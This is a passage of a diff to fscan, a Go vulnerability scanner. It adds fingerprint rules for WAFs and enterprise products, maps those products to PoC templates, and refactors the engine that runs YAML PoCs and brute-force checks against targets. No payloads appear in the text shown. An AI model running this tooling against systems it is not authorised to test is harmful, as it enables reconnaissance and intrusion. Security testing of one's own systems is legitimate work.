+				if poc, _ := lib.LoadPoc(path, Pocs); poc != nil {
+					AllPocs = append(AllPocs, poc)
+				}
+			}
+		}
+	} else {
+		err := filepath.Walk(common.PocPath,
+			func(path string, info os.FileInfo, err error) error {
+				if err != nil || info == nil {
+					return err
+				}
+				if !info.IsDir() {
+					if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
+						poc, _ := lib.LoadPocbyPath(path)
+						if poc != nil {
+							AllPocs = append(AllPocs, poc)
+						}
+					}
+				}
+				return nil
+			})
+		if err != nil {
+			fmt.Printf("[-] init poc error: %v", err)
+		}
+	}
+}
+
+func filterPoc(pocname string) (pocs []*lib.Poc) {
+	if pocname == "" {
+		return AllPocs
+	}
+	for _, poc := range AllPocs {
+		if strings.Contains(poc.Name, pocname) {
+			pocs = append(pocs, poc)
+		}
+	}
+	return
 }

WebScan/info/rules.go

@@ -12,16 +12,54 @@ type Md5Data struct {
 }
 
 type PocData struct {
-	Name	string
-	Alias	string
+	Name  string
+	Alias string
 }
 
 var RuleDatas = []RuleData{
+	{"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"},
+	{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
+	{"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"},
+	{"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"},
+	{"绿盟防火墙", "code", "(NSFOCUS NF)"},
+	{"绿盟防火墙", "headers", "(NSFocus)"},
+	{"Topsec-Waf", "index", `(<META NAME="Copyright" CONTENT="Topsec Network Security Technology Co.,Ltd"/>","<META NAME="DESCRIPTION" CONTENT="Topsec web UI"/>)`},
+	{"Anquanbao", "headers", "(Anquanbao)"},
+	{"BaiduYunjiasu", "headers", "(yunjiasu)"},
+	{"BigIP", "headers", "(BigIP|BIGipServer)"},
+	{"BinarySEC", "headers", "(binarysec)"},
+	{"BlockDoS", "headers", "(BlockDos.net)"},
+	{"CloudFlare", "headers", "(cloudflare)"},
+	{"Cloudfront", "headers", "(cloudfront)"},
+	{"Comodo", "headers", "(Protected by COMODO)"},
+	{"IBM-DataPower", "headers", "(X-Backside-Transport)"},
+	{"DenyAll", "headers", "(sessioncookie=)"},
+	{"dotDefender", "headers", "(dotDefender)"},
+	{"Incapsula", "headers", "(X-CDN|Incapsula)"},
+	{"Jiasule", "headers", "(jsluid=)"},
+	{"KONA", "headers", "(AkamaiGHost)"},
+	{"ModSecurity", "headers", "(Mod_Security|NOYB)"},
+	{"NetContinuum", "headers", "(Cneonction|nnCoection|citrix_ns_id)"},
+	{"Newdefend", "headers", "(newdefend)"},
+	{"Safe3", "headers", "(Safe3WAF|Safe3 Web Firewall)"},
+	{"Safedog", "code", "(404.safedog.cn/images/safedogsite/broswer_logo.jpg)"},
+	{"Safedog", "headers", "(Safedog|WAF/2.0)"},
+	{"SonicWALL", "headers", "(SonicWALL)"},
+	{"Stingray", "headers", "(X-Mapping-)"},
+	{"Sucuri", "headers", "(Sucuri/Cloudproxy)"},
+	{"Usp-Sec", "headers", "(Secure Entry Server)"},
+	{"Varnish", "headers", "(varnish)"},
+	{"Wallarm", "headers", "(wallarm)"},
+	{"阿里云", "code", "(errors.aliyun.com)"},
+	{"WebKnight", "headers", "(WebKnight)"},
+	{"Yundun", "headers", "(YUNDUN)"},
+	{"Yunsuo", "headers", "(yunsuo)"},
+	{"Coding pages", "header", "(Coding Pages)"},
+	{"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"},
 	{"Shiro", "headers", "(=deleteMe|rememberMe=)"},
 	{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
 	{"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
 	{"Gitea简易Git服务", "cookie", "(i_like_gitea)"},
-	{"宝塔-BT.cn", "code", "(app.bt.cn/static/app.png|安全入口校验失败)"},
 	{"Nexus", "code", "(Nexus Repository Manager)"},
 	{"Nexus", "cookie", "(NX-ANTI-CSRF-TOKEN)"},
 	{"Harbor", "code", "(<title>Harbor</title>)"},
@@ -32,11 +70,9 @@ var RuleDatas = []RuleData{
 	{"协众OA", "cookie", "(CNOAOASESSID)"},
 	{"xxl-job", "code", "(分布式任务调度平台XXL-JOB)"},
 	{"atmail-WebMail", "cookie", "(atmail6)"},
-	{"atmail-WebMail", "code", "(Powered by Atmail)"},
-	{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin)"},
+	{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"},
 	{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
-	{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
-	{"致远OA", "code", "(/seeyon/common/)"},
+	{"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
 	{"discuz", "code", "(content=\"Discuz! X\")"},
 	{"Typecho", "code", "(Typecho</a>)"},
 	{"金蝶EAS", "code", "(easSessionId)"},
@@ -56,7 +92,7 @@ var RuleDatas = []RuleData{
 	{"万户网络", "code", "(css/css_whir.css)"},
 	{"Spark_Master", "code", "(Spark Master at)"},
 	{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
-	{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+	{"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"},
 	{"深信服ssl-vpn", "code", "(login_psw.csp)"},
 	{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
 	{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
@@ -95,7 +131,6 @@ var RuleDatas = []RuleData{
 	{"exchange", "code", "(/owa/auth.owa)"},
 	{"Spark_Worker", "code", "(Spark Worker at)"},
 	{"H3C ER3108G", "code", "(ER3108G系统管理)"},
-	{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
 	{"Citrix-ConfProxy", "code", "(confproxy)"},
 	{"360网站安全检测", "code", "(webscan.360.cn/status/pai/hash)"},
 	{"H3C ER5200G2", "code", "(ER5200G2系统管理)"},
@@ -106,7 +141,6 @@ var RuleDatas = []RuleData{
 	{"TP-Link 3600 DD-WRT", "code", "(TP-Link 3600 DD-WRT)"},
 	{"NETGEAR WNDR3600", "code", "(NETGEAR WNDR3600)"},
 	{"H3C ER2100", "code", "(ER2100系统管理)"},
-	{"绿盟下一代防火墙", "code", "(NSFOCUS NF)"},
 	{"jira", "code", "(jira.webresources)"},
 	{"金和协同管理平台", "code", "(金和协同管理平台)"},
 	{"Citrix-NetScaler", "code", "(NS-CACHE)"},
@@ -120,6 +154,7 @@ var RuleDatas = []RuleData{
 	{"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
 	{"Jboss", "headers", "(JBoss)"},
 	{"泛微E-mobile", "code", "(Weaver E-mobile|weaver,e-mobile)"},
+	{"泛微E-mobile", "headers", "(EMobileServer)"},
 	{"齐治堡垒机", "code", "(logo-icon-ico72.png|resources/themes/images/logo-login.png)"},
 	{"ThinkPHP", "headers", "(ThinkPHP)"},
 	{"ThinkPHP", "code", "(/Public/static/js/)"},
@@ -136,13 +171,98 @@ var RuleDatas = []RuleData{
 	{"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"},
 	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization)"},
 	{"GitLab", "code", "(href=\"https://about.gitlab.com/)"},
+	{"用友", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
+	{"Jquery-1.7.2", "code", "(/webui/js/jquerylib/jquery-1.7.2.min.js)"},
+	{"Hadoop Applications", "code", "(/cluster/app/application)"},
+	{"海昌OA", "code", "(/loginmain4/js/jquery.min.js)"},
+	{"帆软报表", "code", "(WebReport/login.html|ReportServer)"},
+	{"帆软报表", "headers", "(数据决策系统)"},
+	{"华夏ERP", "headers", "(华夏ERP)"},
+	{"金和OA", "cookie", "(ASPSESSIONIDSSCDTDBS)"},
+	{"久其财务报表", "code", "(netrep/login.jsp|/netrep/intf)"},
+	{"若依管理系统", "code", "(ruoyi/login.js|ruoyi/js/ry-ui.js)"},
+	{"启莱OA", "code", "(js/jQselect.js|js/jquery-1.4.2.min.js)"},
+	{"智慧校园管理系统", "code", "(DC_Login/QYSignUp)"},
+	{"JQuery-1.7.2", "code", "(webui/js/jquerylib/jquery-1.7.2.min.js)"},
+	{"浪潮 ClusterEngineV4.0", "code", "(0;url=module/login/login.html)"},
+	{"会捷通云视讯平台", "code", "(him/api/rest/v1.0/node/role|him.app)"},
+	{"源码泄露账号密码 F12查看", "code", "(get_dkey_passwd)"},
+	{"Smartbi Insight", "code", "(smartbi.gcf.gcfutil)"},
+	{"汉王人脸考勤管理系统", "code", "(汉王人脸考勤管理系统|/Content/image/hanvan.png|/Content/image/hvicon.ico)"},
+	{"亿赛通-电子文档安全管理系统", "code", "(电子文档安全管理系统|/CDGServer3/index.jsp|/CDGServer3/SysConfig.jsp|/CDGServer3/help/getEditionInfo.jsp)"},
+	{"天融信 TopApp-LB 负载均衡系统", "code", "(TopApp-LB 负载均衡系统)"},
+	{"中新金盾信息安全管理系统", "code", "(中新金盾信息安全管理系统|中新网络信息安全股份有限公司)"},
+	{"好视通", "code", "(深圳银澎云计算有限公司|itunes.apple.com/us/app/id549407870|hao-shi-tong-yun-hui-yi-yuan)"},
+	{"蓝海卓越计费管理系统", "code", "(蓝海卓越计费管理系统|星锐蓝海网络科技有限公司)"},
+	{"和信创天云桌面系统", "code", "(和信下一代云桌面VENGD|/vesystem/index.php)"},
+	{"金山", "code", "(北京猎鹰安全科技有限公司|金山终端安全系统V9.0Web控制台|北京金山安全管理系统技术有限公司|金山V8)"},
+	{"WIFISKY-7层流控路由器", "code", "(深圳市领空技术有限公司|WIFISKY 7层流控路由器)"},
+	{"MetInfo-米拓建站", "code", "(MetInfo|/skin/style/metinfo.css|/skin/style/metinfo-v2.css)"},
+	{"IBM-Lotus-Domino", "code", "(/mailjump.nsf|/domcfg.nsf|/names.nsf|/homepage.nsf)"},
+	{"APACHE-kylin", "code", "(url=kylin)"},
+	{"C-Lodop打印服务系统", "code", "(/CLodopfuncs.js|www.c-lodop.com)"},
+	{"ATLASSIAN-Confluence", "code", "(Atlassian Confluence)"},
+	{"HFS", "code", "(href=\"http://www.rejetto.com/hfs/)"},
+	{"Jellyfin", "code", "(content=\"http://jellyfin.org\")"},
+	{"FIT2CLOUD-JumpServer-堡垒机", "code", "(<title>JumpServer</title>)"},
+	{"Alibaba Nacos", "code", "(<title>Nacos</title>)"},
+	{"Nagios", "headers", "(nagios admin)"},
+	{"Pulse Connect Secure", "code", "(/dana-na/imgs/space.gif)"},
+	{"h5ai", "code", "(powered by h5ai)"},
+	{"jeesite", "cookie", "(jeesite.session.id)"},
+	{"拓尔思SSO", "cookie", "(trsidsssosessionid)"},
+	{"拓尔思WCMv7/6", "cookie", "(com.trs.idm.coSessionId)"},
+	{"天融信脆弱性扫描与管理系统", "code", "(/js/report/horizontalReportPanel.js)"},
+	{"天融信网络审计系统", "code", "(onclick=dlg_download())"},
+	{"天融信日志收集与分析系统", "code", "(天融信日志收集与分析系统)"},
+	{"URP教务系统", "code", "(北京清元优软科技有限公司)"},
+	{"科来RAS", "code", "(科来软件 版权所有|i18ninit.min.js)"},
+	{"正方OA", "code", "(zfoausername)"},
+	{"希尔OA", "code", "(/heeroa/login.do)"},
+	{"泛普建筑工程施工OA", "code", "(/dwr/interface/LoginService.js)"},
+	{"中望OA", "code", "(/IMAGES/default/first/xtoa_logo.png|/app_qjuserinfo/qjuserinfoadd.jsp)"},
+	{"海天OA", "code", "(HTVOS.js)"},
+	{"信达OA", "code", "(http://www.xdoa.cn</a>)"},
+	{"任我行CRM", "code", "(CRM_LASTLOGINUSERKEY)"},
+	{"Spammark邮件信息安全网关", "code", "(/cgi-bin/spammark?empty=1)"},
+	{"winwebmail", "code", "(WinWebMail Server|images/owin.css)"},
+	{"浪潮政务系统", "code", "(LangChao.ECGAP.OutPortal|OnlineQuery/QueryList.aspx)"},
+	{"天融信防火墙", "code", "(/cgi/maincgi.cgi)"},
+	{"网神防火墙", "code", "(css/lsec/login.css)"},
+	{"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
+	{"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
+	{"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
+	{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\")"},
+	{"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"},
+	{"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
+	{"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
+	{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>|<TITLE>Error 404--Not Found</TITLE>|Welcome to Weblogic Application Server|<title>Oracle WebLogic Server 管理控制台</title>)"},
+	{"weblogic", "headers", "(WebLogic)"},
+	{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/common/)"},
+	{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+	{"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"},
+	{"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"},
+	{"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"},
+	{"Swagger UI", "code", "(/swagger-ui.css|swagger-ui-bundle.js|swagger-ui-standalone-preset.js)"},
+	{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js|HTML5/content/themes/kdcss.min.css|/ClientBin/Kingdee.BOS.XPF.App.xap)"},
+	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization|sys/ui/extend/theme/default/style/icon.css|sys/ui/extend/theme/default/style/profile.css)"},
+	{"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg)"},
+	{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
+	{"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
+	{"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
+	{"CMS", "code", "(Powered by .*CMS)"},
+	{"editor", "code", "(editor)"},
+	{"ATLASSIAN-Confluence", "code", "(confluence.)"},
+	{"向日葵", "code", "({\"success\":false,\"msg\":\"Verification failure\"})"},
 }
 
 var Md5Datas = []Md5Data{
 	{"BIG-IP", "04d9541338e525258daf47cc844d59f3"},
 	{"蓝凌OA", "302464c3f6207d57240649926cfc7bd4"},
 	{"JBOSS", "799f70b71314a7508326d1d2f68f7519"},
-	{"锐捷网关", "d8d7c9138e93d43579ebf2e384745ba8"},
+	{"锐捷网络", "d8d7c9138e93d43579ebf2e384745ba8"},
+	{"锐捷网络", "9c21df9129aeec032df8ac15c84e050d"},
+	{"锐捷网络", "a45883b12d753bc87aff5bddbef16ab3"},
 	{"深信服edr", "0b24d4d5c7d300d50ee1cd96059a9e85"},
 	{"致远OA", "cdc85452665e7708caed3009ecb7d4e2"},
 	{"致远OA", "17ac348fcce0b320e7bfab3fe2858dfa"},
@@ -150,27 +270,40 @@ var Md5Datas = []Md5Data{
 	{"致远OA", "3c8df395ec2cbd72782286d18a286a9a"},
 	{"致远OA", "2f761c27b6b7f9386bbd61403635dc42"},
 	{"齐治堡垒机", "48ee373f098d8e96e53b7dd778f09ff4"},
-	{"SprintBoot", "0488faca4c19046b94d07c3ee83cf9d6"},
+	{"SpringBoot", "0488faca4c19046b94d07c3ee83cf9d6"},
 	{"ThinkPHP", "f49c4a4bde1eec6c0b80c2277c76e3db"},
 	{"通达OA", "ed0044587917c76d08573577c8b72883"},
-	{"泛微OA", "41eca7a9245394106a09b2534d8030df"},
+	{"泛微E-mobile", "41eca7a9245394106a09b2534d8030df"},
 	{"泛微OA", "c27547e27e1d2c7514545cd8d5988946"},
 	{"泛微OA", "9b1d3f08ede38dbe699d6b2e72a8febb"},
 	{"泛微OA", "281348dd57383c1f214ffb8aed3a1210"},
 	{"GitLab", "85c754581e1d4b628be5b7712c042224"},
 	{"Hikvision-视频监控", "89b932fcc47cf4ca3faadb0cfdef89cf"},
+	{"华夏erp", "c68b15c45cf80115a943772f7d0028a6"},
+	{"OpenSNS", "08711abfb016a55c0e84f7b54bef5632"},
+	{"MetInfo-米拓建站", "2a9541b5c2225ed2f28734c0d75e456f"},
+	{"IBM-Lotus-Domino", "36c1002bb579edf52a472b9d2e39bb50"},
+	{"IBM-Lotus-Domino", "639b61409215d770a99667b446c80ea1"},
+	{"ATLASSIAN-Confluence", "b91d19259cf480661ef93b67beb45234"},
+	{"activemq", "05664fb0c7afcd6436179437e31f3aa6"},
+	{"coremail", "ad74ff8f9a2f630fc2c5e6b3aa0a5cb8"},
 }
 
 var PocDatas = []PocData{
-	{"致远OA","seeyon"},
-	{"泛微OA","weaver-oa"},
-	{"通达OA","tongda"},
-	{"ThinkPHP","thinkphp"},
-	{"Nexus","nexus"},
-	{"齐治堡垒机","qizhi"},
-	{"weaver-ebridge","weaver-ebridge"},
-	{"weblogic","weblogic"},
-	{"zabbix","zabbix"},
-	{"VMware vSphere","vmware"},
-	{"Jboss","jboss"},
-}
+	{"致远OA", "seeyon"},
+	{"泛微OA", "weaver"},
+	{"通达OA", "tongda"},
+	{"蓝凌OA", "landray"},
+	{"ThinkPHP", "thinkphp"},
+	{"Nexus", "nexus"},
+	{"齐治堡垒机", "qizhi"},
+	{"weaver-ebridge", "weaver-ebridge"},
+	{"weblogic", "weblogic"},
+	{"zabbix", "zabbix"},
+	{"VMware vSphere", "vmware"},
+	{"Jboss", "jboss"},
+	{"用友", "yongyou"},
+	{"用友IUFO", "yongyou"},
+	{"coremail", "coremail"},
+	{"金山", "kingsoft"},
+}

WebScan/lib/check.go

@@ -1,7 +1,6 @@
 package lib
 
 import (
-	"embed"
 	"fmt"
 	"github.com/google/cel-go/cel"
 	"github.com/shadow1ng/fscan/WebScan/info"
@@ -26,22 +25,22 @@ type Task struct {
 	Poc *Poc
 }
 
-func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string) {
+func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) {
 	tasks := make(chan Task)
 	var wg sync.WaitGroup
 	for i := 0; i < workers; i++ {
 		go func() {
 			for task := range tasks {
-				isVul, _ := executePoc(task.Req, task.Poc)
+				isVul, _, name := executePoc(task.Req, task.Poc)
 				if isVul {
-					result := fmt.Sprintf("[+] %s %s", task.Req.URL, task.Poc.Name)
+					result := fmt.Sprintf("[+] %s %s %s", task.Req.URL, task.Poc.Name, name)
 					common.LogSuccess(result)
 				}
 				wg.Done()
 			}
 		}()
 	}
-	for _, poc := range LoadMultiPoc(Pocs, pocname) {
+	for _, poc := range pocs {
 		task := Task{
 			Req: req,
 			Poc: poc,
@@ -53,7 +52,7 @@ func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string
 	close(tasks)
 }
 
-func executePoc(oReq *http.Request, p *Poc) (bool, error) {
+func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 	c := NewEnvOption()
 	c.UpdateCompileOptions(p.Set)
 	if len(p.Sets) > 0 {
@@ -65,13 +64,13 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
 	}
 	env, err := NewEnv(&c)
 	if err != nil {
-		//fmt.Printf("environment creation error: %s\n", err)
-		return false, err
+		fmt.Printf("[-] %s environment creation error: %s\n", p.Name, err)
+		return false, err, ""
 	}
 	req, err := ParseRequest(oReq)
 	if err != nil {
-		//fmt.Println("ParseRequest error",err)
-		return false, err
+		fmt.Printf("[-] %s ParseRequest error: %s\n", p.Name, err)
+		return false, err, ""
 	}
 	variableMap := make(map[string]interface{})
 	variableMap["request"] = req
@@ -119,7 +118,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
 		out, err := Evaluate(env, p.Set["payload"], variableMap)
 		if err != nil {
 			//fmt.Println(p.Name,"  poc_payload error",err)
-			return false, err
+			return false, err, ""
 		}
 		variableMap["payload"] = fmt.Sprintf("%v", out)
 	}
@@ -153,72 +152,107 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
 	}
 
 	success := false
+	//爆破模式,比如tomcat弱口令
 	if setslen > 0 {
 		if haspayload {
 			success, err = clusterpoc1(oReq, p, variableMap, req, env, setskeys)
 		} else {
 			success, err = clusterpoc(oReq, p, variableMap, req, env, setslen, setskeys)
 		}
-	} else {
-		for _, rule := range p.Rules {
-			for k1, v1 := range variableMap {
-				_, isMap := v1.(map[string]string)
-				if isMap {
-					continue
-				}
-				value := fmt.Sprintf("%v", v1)
-				for k2, v2 := range rule.Headers {
-					rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
-				}
-				rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
-				rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
-			}
+		return success, nil, ""
+	}
 
-			if oReq.URL.Path != "" && oReq.URL.Path != "/" {
-				req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
+	DealWithRule := func(rule Rules) (bool, error) {
+		var (
+			flag, ok bool
+		)
+		for k1, v1 := range variableMap {
+			_, isMap := v1.(map[string]string)
+			if isMap {
+				continue
+			}
+			value := fmt.Sprintf("%v", v1)
+			for k2, v2 := range rule.Headers {
+				rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
+			}
+			rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
+			rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
+		}
+
+		if oReq.URL.Path != "" && oReq.URL.Path != "/" {
+			req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
+		} else {
+			req.Url.Path = rule.Path
+		}
+		// 某些poc没有区分path和query，需要处理
+		req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
+		req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
+
+		newRequest, _ := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
+		newRequest.Header = oReq.Header.Clone()
+		for k, v := range rule.Headers {
+			newRequest.Header.Set(k, v)
+		}
+
+		resp, err := DoRequest(newRequest, rule.FollowRedirects)
+		if err != nil {
+			return false, err
+		}
+		variableMap["response"] = resp
+		// 先判断响应页面是否匹配search规则
+		if rule.Search != "" {
+			result := doSearch(strings.TrimSpace(rule.Search), string(resp.Body))
+			if result != nil && len(result) > 0 { // 正则匹配成功
+				for k, v := range result {
+					variableMap[k] = v
+				}
 			} else {
-				req.Url.Path = rule.Path
+				return false, nil
 			}
-			// 某些poc没有区分path和query，需要处理
-			req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
-			req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
+		}
+		out, err := Evaluate(env, rule.Expression, variableMap)
+		if err != nil {
+			return false, err
+		}
+		//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
+		//如果false不继续执行后续rule
+		// 如果最后一步执行失败，就算前面成功了最终依旧是失败
+		flag, ok = out.Value().(bool)
+		if !ok {
+			flag = false
+		}
+		return flag, nil
+	}
 
-			newRequest, _ := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
-			newRequest.Header = oReq.Header.Clone()
-			for k, v := range rule.Headers {
-				newRequest.Header.Set(k, v)
-			}
+	DealWithRules := func(rules []Rules) bool {
+		successFlag := false
+		for _, rule := range rules {
+			flag, err := DealWithRule(rule)
+			//if err != nil {
+			//	fmt.Printf("[-] %s Execute Rule error: %s\n",p.Name,err.Error())
+			//}
 
-			resp, err := DoRequest(newRequest, rule.FollowRedirects)
-			if err != nil {
-				return false, err
-			}
-			variableMap["response"] = resp
-			// 先判断响应页面是否匹配search规则
-			if rule.Search != "" {
-				result := doSearch(strings.TrimSpace(rule.Search), string(resp.Body))
-				if result != nil && len(result) > 0 { // 正则匹配成功
-					for k, v := range result {
-						variableMap[k] = v
-					}
-					//return false, nil
-				} else {
-					return false, nil
-				}
-			}
-			out, err := Evaluate(env, rule.Expression, variableMap)
-			if err != nil {
-				return false, err
-			}
-			//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
-			if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
-				success = false // 如果最后一步执行失败，就算前面成功了最终依旧是失败
+			if err != nil || !flag { //如果false不继续执行后续rule
+				successFlag = false // 如果其中一步为flag，则直接break
 				break
 			}
-			success = true
+			successFlag = true
+		}
+		return successFlag
+	}
+
+	if len(p.Rules) > 0 {
+		success = DealWithRules(p.Rules)
+	} else { // Groups
+		for name, rules := range p.Groups {
+			success = DealWithRules(rules)
+			if success {
+				return success, nil, name
+			}
 		}
 	}
-	return success, nil
+
+	return success, nil, ""
 }
 
 func doSearch(re string, body string) map[string]string {
@@ -308,7 +342,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
 				}
 				rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
 				rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
-				success, err = clustersend(oReq, variableMap, req, env, rule)
+				success, err = clustersend(oReq, variableMap, req, env, rule1)
 				if err != nil {
 					return false, err
 				}
@@ -334,7 +368,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
 					rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
 					rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[1]+"}}", var2)
 					rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[1]+"}}", var2)
-					success, err = clustersend(oReq, variableMap, req, env, rule)
+					success, err = clustersend(oReq, variableMap, req, env, rule1)
 					if err != nil {
 						return false, err
 					}
@@ -682,7 +716,7 @@ func evalset(env *cel.Env, variableMap map[string]interface{}) {
 		if strings.Contains(k, "payload") {
 			out, err := Evaluate(env, expression, variableMap)
 			if err != nil {
-				//fmt.Println(err)
+				fmt.Println(err)
 				variableMap[k] = expression
 			} else {
 				variableMap[k] = fmt.Sprintf("%v", out)
@@ -693,10 +727,9 @@ func evalset(env *cel.Env, variableMap map[string]interface{}) {
 
 func CheckInfoPoc(infostr string) string {
 	for _, poc := range info.PocDatas {
-		if strings.Compare(poc.Name,infostr) == 0 {
+		if strings.Compare(poc.Name, infostr) == 0 {
 			return poc.Alias
 		}
 	}
 	return ""
 }
-

WebScan/lib/client.go

@@ -15,7 +15,7 @@ var (
 	Client           *http.Client
 	ClientNoRedirect *http.Client
 	dialTimout       = 5 * time.Second
-	keepAlive        = 15 * time.Second
+	keepAlive        = 5 * time.Second
 )
 
 func Inithttp(PocInfo common.PocInfo) {
@@ -34,9 +34,9 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
 
 	tr := &http.Transport{
 		DialContext:         dialer.DialContext,
-		MaxConnsPerHost:     0,
+		MaxConnsPerHost:     5,
 		MaxIdleConns:        0,
-		MaxIdleConnsPerHost: ThreadsNum * 2,
+		MaxIdleConnsPerHost: 2,
 		IdleConnTimeout:     keepAlive,
 		TLSClientConfig:     &tls.Config{InsecureSkipVerify: true},
 		TLSHandshakeTimeout: 5 * time.Second,
@@ -45,6 +45,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
 	if DownProxy != "" {
 		if DownProxy == "1" {
 			DownProxy = "http://127.0.0.1:8080"
+		} else if DownProxy == "2" {
+			DownProxy = "socks5://127.0.0.1:1080"
 		} else if !strings.Contains(DownProxy, "://") {
 			DownProxy = "http://127.0.0.1:" + DownProxy
 		}

WebScan/lib/eval.go

@@ -558,7 +558,7 @@ func ParseResponse(oResp *http.Response) (*Response, error) {
 	resp.Status = int32(oResp.StatusCode)
 	resp.Url = ParseUrl(oResp.Request.URL)
 	for k := range oResp.Header {
-		header[k] = oResp.Header.Get(k)
+		header[k] = strings.Join(oResp.Header.Values(k), ";")
 	}
 	resp.Headers = header
 	resp.ContentType = oResp.Header.Get("Content-Type")
@@ -591,9 +591,8 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
 			body = append(body, buf...)
 		}
 	} else {
-		raw, err := ioutil.ReadAll(oResp.Body)
+		raw, err := ioutil.ReadAll(io.LimitReader(oResp.Body, int64(5<<20)))
 		if err != nil {
-			//utils.Logger.Error(err)
 			return nil, err
 		}
 		defer oResp.Body.Close()

WebScan/lib/http.pb.go

@@ -5,13 +5,40 @@ package lib
 
